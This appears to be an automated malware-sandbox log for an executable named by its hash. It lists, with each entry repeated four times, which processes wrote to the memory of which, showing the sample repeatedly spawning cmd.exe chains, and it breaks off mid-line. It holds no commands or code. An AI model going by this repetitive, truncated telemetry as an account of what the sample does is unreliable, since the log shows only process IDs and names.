d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 773 PID 1116 wrote to memory of 1376 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 773 PID 1376 wrote to memory of 1896 1376 cmd.exe 775 PID 1376 wrote to memory of 1896 1376 cmd.exe 775 PID 1376 wrote to memory of 1896 1376 cmd.exe 775 PID 1376 wrote to memory of 1896 1376 cmd.exe 775 PID 1376 wrote to memory of 968 1376 cmd.exe 776 PID 1376 wrote to memory of 968 1376 cmd.exe 776 PID 1376 wrote to memory of 968 1376 cmd.exe 776 PID 1376 wrote to memory of 968 1376 cmd.exe 776 PID 1376 wrote to memory of 1912 1376 cmd.exe 777 PID 1376 wrote to memory of 1912 1376 cmd.exe 777 PID 1376 wrote to memory of 1912 1376 cmd.exe 777 PID 1376 wrote to memory of 1912 1376 cmd.exe 777 PID 1912 wrote to memory of 1236 1912 cmd.exe 778 PID 1912 wrote to memory of 1236 1912 cmd.exe 778 PID 1912 wrote to memory of 1236 1912 cmd.exe 778 PID 1912 wrote to memory of 1236 1912 cmd.exe 778 PID 1376 wrote to memory of 228 1376 cmd.exe 779 PID 1376 wrote to memory of 228 1376 cmd.exe 779 PID 1376 wrote to memory of 228 1376 cmd.exe 779 PID 1376 wrote to memory of 228 1376 cmd.exe 779 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 780 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 780 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 780 PID 1116 wrote to memory of 1412 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 780 PID 1412 wrote to memory of 1772 1412 cmd.exe 782 PID 1412 wrote to memory of 1772 1412 cmd.exe 782 PID 1412 wrote to memory of 1772 1412 cmd.exe 782 PID 1412 wrote to memory of 1772 1412 cmd.exe 782 PID 1412 wrote to memory of 1800 1412 cmd.exe 783 PID 1412 wrote to memory of 1800 1412 cmd.exe 783 PID 1412 wrote to memory of 1800 1412 cmd.exe 783 PID 1412 wrote to memory of 1800 1412 cmd.exe 783 PID 1412 wrote to memory of 300 1412 cmd.exe 784 PID 1412 wrote to memory of 300 1412 cmd.exe 784 PID 1412 wrote to memory of 300 1412 cmd.exe 784 PID 1412 wrote to memory of 300 1412 cmd.exe 784 PID 300 wrote to memory of 964 300 cmd.exe 785 PID 300 wrote to memory of 964 300 cmd.exe 785 PID 300 wrote to memory of 964 300 cmd.exe 785 PID 300 wrote to memory of 964 300 cmd.exe 785 PID 1412 wrote to memory of 220 1412 cmd.exe 786 PID 1412 wrote to memory of 220 1412 cmd.exe 786 PID 1412 wrote to memory of 220 1412 cmd.exe 786 PID 1412 wrote to memory of 220 1412 cmd.exe 786 PID 1116 wrote to memory of 1468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 787 PID 1116 wrote to memory of 1468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 787 PID 1116 wrote to memory of 1468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 787 PID 1116 wrote to memory of 1468 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 787 PID 1468 wrote to memory of 1860 1468 cmd.exe 789 PID 1468 wrote to memory of 1860 1468 cmd.exe 789 PID 1468 wrote to memory of 1860 1468 cmd.exe 789 PID 1468 wrote to memory of 1860 1468 cmd.exe 789 PID 1468 wrote to memory of 1168 1468 cmd.exe 790 PID 1468 wrote to memory of 1168 1468 cmd.exe 790 PID 1468 wrote to memory of 1168 1468 cmd.exe 790 PID 1468 wrote to memory of 1168 1468 cmd.exe 790 PID 1468 wrote to memory of 848 1468 cmd.exe 791 PID 1468 wrote to memory of 848 1468 cmd.exe 791 PID 1468 wrote to memory of 848 1468 cmd.exe 791 PID 1468 wrote to memory of 848 1468 cmd.exe 791 PID 848 wrote to memory of 1028 848 cmd.exe 792 PID 848 wrote to memory of 1028 848 cmd.exe 792 PID 848 wrote to memory of 1028 848 cmd.exe 792 PID 848 wrote to memory of 1028 848 cmd.exe 792 PID 1468 wrote to memory of 1260 1468 cmd.exe 793 PID 1468 wrote to memory of 1260 1468 cmd.exe 793 PID 1468 wrote to memory of 1260 1468 cmd.exe 793 PID 1468 wrote to memory of 1260 1468 cmd.exe 793 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 794 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 794 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 794 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 794 PID 900 wrote to memory of 1984 900 cmd.exe 796 PID 900 wrote to memory of 1984 900 cmd.exe 796 PID 900 wrote to memory of 1984 900 cmd.exe 796 PID 900 wrote to memory of 1984 900 cmd.exe 796 PID 900 wrote to memory of 1816 900 cmd.exe 797 PID 900 wrote to memory of 1816 900 cmd.exe 797 PID 900 wrote to memory of 1816 900 cmd.exe 797 PID 900 wrote to memory of 1816 900 cmd.exe 797 PID 900 wrote to memory of 864 900 cmd.exe 798 PID 900 wrote to memory of 864 900 cmd.exe 798 PID 900 wrote to memory of 864 900 cmd.exe 798 PID 900 wrote to memory of 864 900 cmd.exe 798 PID 864 wrote to memory of 1840 864 cmd.exe 799 PID 864 wrote to memory of 1840 864 cmd.exe 799 PID 864 wrote to memory of 1840 864 cmd.exe 799 PID 864 wrote to memory of 1840 864 cmd.exe 799 PID 900 wrote to memory of 1404 900 cmd.exe 800 PID 900 wrote to memory of 1404 900 cmd.exe 800 PID 900 wrote to memory of 1404 900 cmd.exe 800 PID 900 wrote to memory of 1404 900 cmd.exe 800 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 801 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 801 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 801 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 801 PID 1772 wrote to memory of 896 1772 cmd.exe 803 PID 1772 wrote to memory of 896 1772 cmd.exe 803 PID 1772 wrote to memory of 896 1772 cmd.exe 803 PID 1772 wrote to memory of 896 1772 cmd.exe 803 PID 1772 wrote to memory of 1952 1772 cmd.exe 804 PID 1772 wrote to memory of 1952 1772 cmd.exe 804 PID 1772 wrote to memory of 1952 1772 cmd.exe 804 PID 1772 wrote to memory of 1952 1772 cmd.exe 804 PID 1772 wrote to memory of 1756 1772 cmd.exe 805 PID 1772 wrote to memory of 1756 1772 cmd.exe 805 PID 1772 wrote to memory of 1756 1772 cmd.exe 805 PID 1772 wrote to memory of 1756 1772 cmd.exe 805 PID 1756 wrote to memory of 1204 1756 cmd.exe 806 PID 1756 wrote to memory of 1204 1756 cmd.exe 806 PID 1756 wrote to memory of 1204 1756 cmd.exe 806 PID 1756 wrote to memory of 1204 1756 cmd.exe 806 PID 1772 wrote to memory of 1780 1772 cmd.exe 807 PID 1772 wrote to memory of 1780 1772 cmd.exe 807 PID 1772 wrote to memory of 1780 1772 cmd.exe 807 PID 1772 wrote to memory of 1780 1772 cmd.exe 807 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 808 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 808 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 808 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 808 PID 1860 wrote to memory of 1096 1860 cmd.exe 810 PID 1860 wrote to memory of 1096 1860 cmd.exe 810 PID 1860 wrote to memory of 1096 1860 cmd.exe 810 PID 1860 wrote to memory of 1096 1860 cmd.exe 810 PID 1860 wrote to memory of 940 1860 cmd.exe 811 PID 1860 wrote to memory of 940 1860 cmd.exe 811 PID 1860 wrote to memory of 940 1860 cmd.exe 811 PID 1860 wrote to memory of 940 1860 cmd.exe 811 PID 1860 wrote to memory of 212 1860 cmd.exe 812 PID 1860 wrote to memory of 212 1860 cmd.exe 812 PID 1860 wrote to memory of 212 1860 cmd.exe 812 PID 1860 wrote to memory of 212 1860 cmd.exe 812 PID 212 wrote to memory of 1260 212 cmd.exe 813 PID 212 wrote to memory of 1260 212 cmd.exe 813 PID 212 wrote to memory of 1260 212 cmd.exe 813 PID 212 wrote to memory of 1260 212 cmd.exe 813 PID 1860 wrote to memory of 1468 1860 cmd.exe 814 PID 1860 wrote to memory of 1468 1860 cmd.exe 814 PID 1860 wrote to memory of 1468 1860 cmd.exe 814 PID 1860 wrote to memory of 1468 1860 cmd.exe 814 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 815 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 815 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 815 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 815 PID 1080 wrote to memory of 292 1080 cmd.exe 817 PID 1080 wrote to memory of 292 1080 cmd.exe 817 PID 1080 wrote to memory of 292 1080 cmd.exe 817 PID 1080 wrote to memory of 292 1080 cmd.exe 817 PID 1080 wrote to memory of 1840 1080 cmd.exe 818 PID 1080 wrote to memory of 1840 1080 cmd.exe 818 PID 1080 wrote to memory of 1840 1080 cmd.exe 818 PID 1080 wrote to memory of 1840 1080 cmd.exe 818 PID 1080 wrote to memory of 1808 1080 cmd.exe 819 PID 1080 wrote to memory of 1808 1080 cmd.exe 819 PID 1080 wrote to memory of 1808 1080 cmd.exe 819 PID 1080 wrote to memory of 1808 1080 cmd.exe 819 PID 1808 wrote to memory of 1404 1808 cmd.exe 820 PID 1808 wrote to memory of 1404 1808 cmd.exe 820 PID 1808 wrote to memory of 1404 1808 cmd.exe 820 PID 1808 wrote to memory of 1404 1808 cmd.exe 820 PID 1080 wrote to memory of 900 1080 cmd.exe 821 PID 1080 wrote to memory of 900 1080 cmd.exe 821 PID 1080 wrote to memory of 900 1080 cmd.exe 821 PID 1080 wrote to memory of 900 1080 cmd.exe 821 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 822 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 822 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 822 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 822 PID 964 wrote to memory of 1108 964 cmd.exe 824 PID 964 wrote to memory of 1108 964 cmd.exe 824 PID 964 wrote to memory of 1108 964 cmd.exe 824 PID 964 wrote to memory of 1108 964 cmd.exe 824 PID 964 wrote to memory of 1936 964 cmd.exe 825 PID 964 wrote to memory of 1936 964 cmd.exe 825 PID 964 wrote to memory of 1936 964 cmd.exe 825 PID 964 wrote to memory of 1936 964 cmd.exe 825 PID 964 wrote to memory of 972 964 cmd.exe 826 PID 964 wrote to memory of 972 964 cmd.exe 826 PID 964 wrote to memory of 972 964 cmd.exe 826 PID 964 wrote to memory of 972 964 cmd.exe 826 PID 972 wrote to memory of 1780 972 cmd.exe 827 PID 972 wrote to memory of 1780 972 cmd.exe 827 PID 972 wrote to memory of 1780 972 cmd.exe 827 PID 972 wrote to memory of 1780 972 cmd.exe 827 PID 964 wrote to memory of 1772 964 cmd.exe 828 PID 964 wrote to memory of 1772 964 cmd.exe 828 PID 964 wrote to memory of 1772 964 cmd.exe 828 PID 964 wrote to memory of 1772 964 cmd.exe 828 PID 1116 wrote to memory of 1028 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 829 PID 1116 wrote to memory of 1028 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 829 PID 1116 wrote to memory of 1028 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 829 PID 1116 wrote to memory of 1028 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 829 PID 1028 wrote to memory of 1344 1028 cmd.exe 831 PID 1028 wrote to memory of 1344 1028 cmd.exe 831 PID 1028 wrote to memory of 1344 1028 cmd.exe 831 PID 1028 wrote to memory of 1344 1028 cmd.exe 831 PID 1028 wrote to memory of 944 1028 cmd.exe 832 PID 1028 wrote to memory of 944 1028 cmd.exe 832 PID 1028 wrote to memory of 944 1028 cmd.exe 832 PID 1028 wrote to memory of 944 1028 cmd.exe 832 PID 1028 wrote to memory of 1236 1028 cmd.exe 833 PID 1028 wrote to memory of 1236 1028 cmd.exe 833 PID 1028 wrote to memory of 1236 1028 cmd.exe 833 PID 1028 wrote to memory of 1236 1028 cmd.exe 833 PID 1236 wrote to memory of 208 1236 cmd.exe 834 PID 1236 wrote to memory of 208 1236 cmd.exe 834 PID 1236 wrote to memory of 208 1236 cmd.exe 834 PID 1236 wrote to memory of 208 1236 cmd.exe 834 PID 1028 wrote to memory of 1820 1028 cmd.exe 835 PID 1028 wrote to memory of 1820 1028 cmd.exe 835 PID 1028 wrote to memory of 1820 1028 cmd.exe 835 PID 1028 wrote to memory of 1820 1028 cmd.exe 835 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 836 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 836 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 836 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 836 PID 292 wrote to memory of 1424 292 cmd.exe 838 PID 292 wrote to memory of 1424 292 cmd.exe 838 PID 292 wrote to memory of 1424 292 cmd.exe 838 PID 292 wrote to memory of 1424 292 cmd.exe 838 PID 292 wrote to memory of 932 292 cmd.exe 839 PID 292 wrote to memory of 932 292 cmd.exe 839 PID 292 wrote to memory of 932 292 cmd.exe 839 PID 292 wrote to memory of 932 292 cmd.exe 839 PID 292 wrote to memory of 1528 292 cmd.exe 840 PID 292 wrote to memory of 1528 292 cmd.exe 840 PID 292 wrote to memory of 1528 292 cmd.exe 840 PID 292 wrote to memory of 1528 292 cmd.exe 840 PID 1528 wrote to memory of 1816 1528 cmd.exe 841 PID 1528 wrote to memory of 1816 1528 cmd.exe 841 PID 1528 wrote to memory of 1816 1528 cmd.exe 841 PID 1528 wrote to memory of 1816 1528 cmd.exe 841 PID 292 wrote to memory of 1428 292 cmd.exe 842 PID 292 wrote to memory of 1428 292 cmd.exe 842 PID 292 wrote to memory of 1428 292 cmd.exe 842 PID 292 wrote to memory of 1428 292 cmd.exe 842 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 843 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 843 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 843 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 843 PID 1108 wrote to memory of 1876 1108 cmd.exe 845 PID 1108 wrote to memory of 1876 1108 cmd.exe 845 PID 1108 wrote to memory of 1876 1108 cmd.exe 845 PID 1108 wrote to memory of 1876 1108 cmd.exe 845 PID 1108 wrote to memory of 1888 1108 cmd.exe 846 PID 1108 wrote to memory of 1888 1108 cmd.exe 846 PID 1108 wrote to memory of 1888 1108 cmd.exe 846 PID 1108 wrote to memory of 1888 1108 cmd.exe 846 PID 1108 wrote to memory of 1788 1108 cmd.exe 847 PID 1108 wrote to memory of 1788 1108 cmd.exe 847 PID 1108 wrote to memory of 1788 1108 cmd.exe 847 PID 1108 wrote to memory of 1788 1108 cmd.exe 847 PID 1788 wrote to memory of 220 1788 cmd.exe 848 PID 1788 wrote to memory of 220 1788 cmd.exe 848 PID 1788 wrote to memory of 220 1788 cmd.exe 848 PID 1788 wrote to memory of 220 1788 cmd.exe 848 PID 1108 wrote to memory of 296 1108 cmd.exe 849 PID 1108 wrote to memory of 296 1108 cmd.exe 849 PID 1108 wrote to memory of 296 1108 cmd.exe 849 PID 1108 wrote to memory of 296 1108 cmd.exe 849 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 850 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 850 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 850 PID 1116 wrote to memory of 1344 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 850 PID 1344 wrote to memory of 280 1344 cmd.exe 852 PID 1344 wrote to memory of 280 1344 cmd.exe 852 PID 1344 wrote to memory of 280 1344 cmd.exe 852 PID 1344 wrote to memory of 280 1344 cmd.exe 852 PID 1344 wrote to memory of 1128 1344 cmd.exe 853 PID 1344 wrote to memory of 1128 1344 cmd.exe 853 PID 1344 wrote to memory of 1128 1344 cmd.exe 853 PID 1344 wrote to memory of 1128 1344 cmd.exe 853 PID 1344 wrote to memory of 1376 1344 cmd.exe 854 PID 1344 wrote to memory of 1376 1344 cmd.exe 854 PID 1344 wrote to memory of 1376 1344 cmd.exe 854 PID 1344 wrote to memory of 1376 1344 cmd.exe 854 PID 1376 wrote to memory of 1820 1376 cmd.exe 855 PID 1376 wrote to memory of 1820 1376 cmd.exe 855 PID 1376 wrote to memory of 1820 1376 cmd.exe 855 PID 1376 wrote to memory of 1820 1376 cmd.exe 855 PID 1344 wrote to memory of 1028 1344 cmd.exe 856 PID 1344 wrote to memory of 1028 1344 cmd.exe 856 PID 1344 wrote to memory of 1028 1344 cmd.exe 856 PID 1344 wrote to memory of 1028 1344 cmd.exe 856 PID 1116 wrote to memory of 1896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 857 PID 1116 wrote to memory of 1896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 857 PID 1116 wrote to memory of 1896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 857 PID 1116 wrote to memory of 1896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 857 PID 1896 wrote to memory of 1912 1896 cmd.exe 859 PID 1896 wrote to memory of 1912 1896 cmd.exe 859 PID 1896 wrote to memory of 1912 1896 cmd.exe 859 PID 1896 wrote to memory of 1912 1896 cmd.exe 859 PID 1896 wrote to memory of 1816 1896 cmd.exe 860 PID 1896 wrote to memory of 1816 1896 cmd.exe 860 PID 1896 wrote to memory of 1816 1896 cmd.exe 860 PID 1896 wrote to memory of 1816 1896 cmd.exe 860 PID 1896 wrote to memory of 232 1896 cmd.exe 861 PID 1896 wrote to memory of 232 1896 cmd.exe 861 PID 1896 wrote to memory of 232 1896 cmd.exe 861 PID 1896 wrote to memory of 232 1896 cmd.exe 861 PID 232 wrote to memory of 300 232 cmd.exe 862 PID 232 wrote to memory of 300 232 cmd.exe 862 PID 232 wrote to memory of 300 232 cmd.exe 862 PID 232 wrote to memory of 300 232 cmd.exe 862 PID 1896 wrote to memory of 204 1896 cmd.exe 863 PID 1896 wrote to memory of 204 1896 cmd.exe 863 PID 1896 wrote to memory of 204 1896 cmd.exe 863 PID 1896 wrote to memory of 204 1896 cmd.exe 863 PID 1116 wrote to memory of 1780 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 864 PID 1116 wrote to memory of 1780 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 864 PID 1116 wrote to memory of 1780 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 864 PID 1116 wrote to memory of 1780 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 864 PID 1780 wrote to memory of 1772 1780 cmd.exe 866 PID 1780 wrote to memory of 1772 1780 cmd.exe 866 PID 1780 wrote to memory of 1772 1780 cmd.exe 866 PID 1780 wrote to memory of 1772 1780 cmd.exe 866 PID 1780 wrote to memory of 1952 1780 cmd.exe 867 PID 1780 wrote to memory of 1952 1780 cmd.exe 867 PID 1780 wrote to memory of 1952 1780 cmd.exe 867 PID 1780 wrote to memory of 1952 1780 cmd.exe 867 PID 1780 wrote to memory of 1788 1780 cmd.exe 868 PID 1780 wrote to memory of 1788 1780 cmd.exe 868 PID 1780 wrote to memory of 1788 1780 cmd.exe 868 PID 1780 wrote to memory of 1788 1780 cmd.exe 868 PID 1788 wrote to memory of 940 1788 cmd.exe 869 PID 1788 wrote to memory of 940 1788 cmd.exe 869 PID 1788 wrote to memory of 940 1788 cmd.exe 869 PID 1788 wrote to memory of 940 1788 cmd.exe 869 PID 1780 wrote to memory of 1108 1780 cmd.exe 870 PID 1780 wrote to memory of 1108 1780 cmd.exe 870 PID 1780 wrote to memory of 1108 1780 cmd.exe 870 PID 1780 wrote to memory of 1108 1780 cmd.exe 870 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 871 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 871 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 871 PID 1116 wrote to memory of 928 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 871 PID 928 wrote to memory of 1608 928 cmd.exe 873 PID 928 wrote to memory of 1608 928 cmd.exe 873 PID 928 wrote to memory of 1608 928 cmd.exe 873 PID 928 wrote to memory of 1608 928 cmd.exe 873 PID 928 wrote to memory of 1820 928 cmd.exe 874 PID 928 wrote to memory of 1820 928 cmd.exe 874 PID 928 wrote to memory of 1820 928 cmd.exe 874 PID 928 wrote to memory of 1820 928 cmd.exe 874 PID 928 wrote to memory of 1096 928 cmd.exe 875 PID 928 wrote to memory of 1096 928 cmd.exe 875 PID 928 wrote to memory of 1096 928 cmd.exe 875 PID 928 wrote to memory of 1096 928 cmd.exe 875 PID 1096 wrote to memory of 1404 1096 cmd.exe 876 PID 1096 wrote to memory of 1404 1096 cmd.exe 876 PID 1096 wrote to memory of 1404 1096 cmd.exe 876 PID 1096 wrote to memory of 1404 1096 cmd.exe 876 PID 928 wrote to memory of 1344 928 cmd.exe 877 PID 928 wrote to memory of 1344 928 cmd.exe 877 PID 928 wrote to memory of 1344 928 cmd.exe 877 PID 928 wrote to memory of 1344 928 cmd.exe 877 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 878 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 878 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 878 PID 1116 wrote to memory of 1080 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 878 PID 1080 wrote to memory of 224 1080 cmd.exe 880 PID 1080 wrote to memory of 224 1080 cmd.exe 880 PID 1080 wrote to memory of 224 1080 cmd.exe 880 PID 1080 wrote to memory of 224 1080 cmd.exe 880 PID 1080 wrote to memory of 1428 1080 cmd.exe 881 PID 1080 wrote to memory of 1428 1080 cmd.exe 881 PID 1080 wrote to memory of 1428 1080 cmd.exe 881 PID 1080 wrote to memory of 1428 1080 cmd.exe 881 PID 1080 wrote to memory of 232 1080 cmd.exe 882 PID 1080 wrote to memory of 232 1080 cmd.exe 882 PID 1080 wrote to memory of 232 1080 cmd.exe 882 PID 1080 wrote to memory of 232 1080 cmd.exe 882 PID 232 wrote to memory of 756 232 cmd.exe 883 PID 232 wrote to memory of 756 232 cmd.exe 883 PID 232 wrote to memory of 756 232 cmd.exe 883 PID 232 wrote to memory of 756 232 cmd.exe 883 PID 1080 wrote to memory of 1896 1080 cmd.exe 884 PID 1080 wrote to memory of 1896 1080 cmd.exe 884 PID 1080 wrote to memory of 1896 1080 cmd.exe 884 PID 1080 wrote to memory of 1896 1080 cmd.exe 884 PID 1116 wrote to memory of 1904 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 885 PID 1116 wrote to memory of 1904 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 885 PID 1116 wrote to memory of 1904 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 885 PID 1116 wrote to memory of 1904 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 885 PID 1904 wrote to memory of 1260 1904 cmd.exe 887 PID 1904 wrote to memory of 1260 1904 cmd.exe 887 PID 1904 wrote to memory of 1260 1904 cmd.exe 887 PID 1904 wrote to memory of 1260 1904 cmd.exe 887 PID 1904 wrote to memory of 296 1904 cmd.exe 888 PID 1904 wrote to memory of 296 1904 cmd.exe 888 PID 1904 wrote to memory of 296 1904 cmd.exe 888 PID 1904 wrote to memory of 296 1904 cmd.exe 888 PID 1904 wrote to memory of 1788 1904 cmd.exe 889 PID 1904 wrote to memory of 1788 1904 cmd.exe 889 PID 1904 wrote to memory of 1788 1904 cmd.exe 889 PID 1904 wrote to memory of 1788 1904 cmd.exe 889 PID 1788 wrote to memory of 944 1788 cmd.exe 890 PID 1788 wrote to memory of 944 1788 cmd.exe 890 PID 1788 wrote to memory of 944 1788 cmd.exe 890 PID 1788 wrote to memory of 944 1788 cmd.exe 890 PID 1904 wrote to memory of 1780 1904 cmd.exe 891 PID 1904 wrote to memory of 1780 1904 cmd.exe 891 PID 1904 wrote to memory of 1780 1904 cmd.exe 891 PID 1904 wrote to memory of 1780 1904 cmd.exe 891 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 892 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 892 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 892 PID 1116 wrote to memory of 848 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 892 PID 848 wrote to memory of 1892 848 cmd.exe 894 PID 848 wrote to memory of 1892 848 cmd.exe 894 PID 848 wrote to memory of 1892 848 cmd.exe 894 PID 848 wrote to memory of 1892 848 cmd.exe 894 PID 848 wrote to memory of 1960 848 cmd.exe 895 PID 848 wrote to memory of 1960 848 cmd.exe 895 PID 848 wrote to memory of 1960 848 cmd.exe 895 PID 848 wrote to memory of 1960 848 cmd.exe 895 PID 848 wrote to 